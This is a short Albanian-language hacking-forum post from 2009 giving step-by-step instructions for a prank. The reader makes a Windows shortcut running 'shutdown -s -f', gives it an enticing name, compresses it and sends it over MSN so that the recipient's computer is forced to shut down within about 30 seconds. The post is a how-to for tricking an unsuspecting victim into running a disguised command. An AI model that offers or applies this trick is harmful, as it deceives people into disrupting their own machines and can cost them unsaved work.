Miresevini ne HacK Group Ju Lutemi pare se regjistroheni te Prezantoheni


  shym pc me fore

  Th3 3xperTi
  Th3 3xperTi
  Admin
  Admin

  Numri i postimeve : 22
  Join date : 16/06/2009
  Location : N`ControL Panel

  shym pc me fore Empty shym pc me fore

  Mesazh  Th3 3xperTi prej Tue Jun 23, 2009 3:35 pm

  vshym pc me fore


  me shym pc me fore per 30 sec...

  1.kliko dikund ne hapsir te tastin e djatht te mausit
  2.new
  3.shortcut
  4.shutdown -s -f
  5.ok
  6. ja leni nji emer per ma hanger dikush foren
  7. nese don e kompreseon me ja que dikujt per mes msn
  8.dhe per 30 sekond pc-se i behete shutdown........
  (mos e provo ne pc tande sepse mun me ta shkym

   Ora është Wed Jun 26, 2019 12:34 am